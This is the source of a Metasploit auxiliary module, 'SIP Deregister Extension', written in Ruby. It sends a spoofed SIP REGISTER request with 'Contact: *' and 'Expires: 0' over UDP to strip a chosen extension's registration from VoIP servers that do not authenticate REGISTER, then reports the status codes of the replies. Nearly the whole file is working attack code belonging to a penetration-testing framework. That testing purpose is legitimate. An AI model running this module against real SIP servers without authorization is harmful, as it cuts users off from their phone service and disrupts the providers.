Path: blob/master/modules/auxiliary/voip/sip_deregister.rb
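##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that sends a single SIP REGISTER request with
# "Contact: *" and "Expires: 0" for EXTENSION@DOMAIN to each target over UDP,
# then reports the status code of every reply it receives.
#
# The request carries no credentials. A registrar that authenticates REGISTER
# answers 401 or 403, which parse_reply reports as a failed de-registration;
# the module description states it was only tested against servers that do
# not use REGISTER authentication.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Scanner

  # Registers module metadata and the datastore options read by #run_host.
  def initialize
    super(
      'Name'        => 'SIP Deregister Extension',
      'Description' => %q{
        This module will attempt to deregister a SIP user from the provider. It
        has been tested successfully when the sip provider/server doesn't use REGISTER
        authentication.
      },
      'Author'      => [ 'ChrisJohnRiley' ],
      'License'     => MSF_LICENSE
    )

    deregister_udp_options
    register_options(
      [
        Opt::RPORT(5060),
        OptString.new('SRCADDR', [true, "The sip address the spoofed deregister request is coming from", '192.168.1.1']),
        OptString.new('EXTENSION', [true, "The specific extension or name to target", '100']),
        OptString.new('DOMAIN', [true, "Use a specific SIP domain", 'example.com'])
      ])
    register_advanced_options(
      [
        OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),
        OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])
      ])
  end

  # Validates operator-supplied options before the scan starts.
  #
  # EXTENSION and DOMAIN are interpolated into the request line and the
  # To/From headers, so any whitespace (which includes CR and LF) would
  # corrupt the message framing.
  #
  # @raise [ArgumentError] if EXTENSION or DOMAIN contains whitespace
  def setup
    if datastore['EXTENSION'] =~ /\s/
      raise ArgumentError, "EXTENSION cannot contain spaces"
    elsif datastore['DOMAIN'] =~ /\s/
      raise ArgumentError, "DOMAIN cannot contain spaces"
    end
  end

  # Sends the REGISTER request to one target and prints the outcome of every
  # reply received on the socket.
  #
  # @param ip [String] address of the host currently being scanned; it is also
  #   appended to the Call-ID value
  def run_host(ip)
    src    = datastore['SRCADDR']
    ext    = datastore['EXTENSION']
    dom    = datastore['DOMAIN']
    sphost = datastore['SIP_PROXY_NAME']
    spport = datastore['SIP_PROXY_PORT'] || 5060
    conn_string = "#{ext}@#{dom}"

    # A Route header is added only when a proxy has been configured.
    route = nil
    route = "Route: <sip:#{sphost}:#{spport};lr>\r\n" unless sphost.to_s.empty?

    connect_udp

    print_status("Sending deregistration packet to: #{conn_string}")
    print_status("Using SIP proxy #{sphost}:#{spport}") if route

    req = "REGISTER sip:#{dom} SIP/2.0\r\n"
    req << route if route
    req << "Via: SIP/2.0/UDP #{src}\r\n"
    req << "Max-Forwards: 70\r\n"
    req << "To: \"#{ext}\"<sip:#{conn_string}>\r\n"
    req << "From: \"#{ext}\"<sip:#{conn_string}>\r\n"
    req << "Call-ID: #{rand(100) + 100}#{ip}\r\n"
    req << "CSeq: 1 REGISTER\r\n"
    req << "Contact: *\r\n"
    req << "Expires: 0\r\n"
    req << "Content-Length: 0\r\n\r\n"

    udp_sock.put(req)
    response = false

    # Drain replies until recvfrom returns no peer address. The second
    # argument is presumably a timeout in seconds -- confirm against the
    # socket API in use.
    while (r = udp_sock.recvfrom(65535, 3)) && r[1]
      response = parse_reply(r)
    end

    # Silence is expected when SRCADDR is not this host, because the Via
    # header then names a different address.
    print_error("No response received from remote host") unless response
  rescue Errno::EACCES => e
    # Previously swallowed without a trace. Report it in verbose mode only,
    # so the default output of a scan is unchanged.
    vprint_error("#{ip} - Permission denied sending SIP request (#{e.message})")
  ensure
    disconnect_udp
  end

  # Interprets one reply and prints whether the binding was removed.
  #
  # @param pkt [Array] reply as returned by recvfrom: payload, peer host,
  #   peer port. pkt[1] is rewritten in place when it carries an IPv4-mapped
  #   "::ffff:" prefix.
  # @return [true] always, so the caller can record that a reply arrived
  def parse_reply(pkt)
    pkt[1] = pkt[1].sub(/\A::ffff:/, '') if pkt[1] =~ /\A::ffff:/
    rhost, rport = pkt[1], pkt[2]

    # The second whitespace-separated token of a SIP response is its status
    # code. Anything unparsable becomes 0 and falls through to the else branch.
    status = pkt[0].split(/\s+/)[1].to_i

    # Identify the binding by the To header, without its ;parameters.
    to_value = pkt[0][/^To:\s*(.*)$/i, 1]
    target = to_value && to_value.strip.split(';')[0]

    # With no usable To header the messages used to start with an empty
    # name, so fall back to the peer address.
    target = "#{rhost}:#{rport}" if target.nil? || target.empty?

    # The value comes from the remote host and is echoed to the console, so
    # replace anything outside printable ASCII (control and escape bytes).
    target = target.dup.force_encoding(Encoding::BINARY).gsub(/[^\x20-\x7e]/n, '.')

    case status
    when 401
      print_error("Unable to de-register #{target} [401 Unauthorised]")
    when 403
      print_error("Unable to de-register #{target} [403 Forbidden]")
    when 200
      print_good("#{target} de-registered [200 OK]")
    else
      print_error("#{target} : Undefined error code #{status}")
    end

    true
  end
end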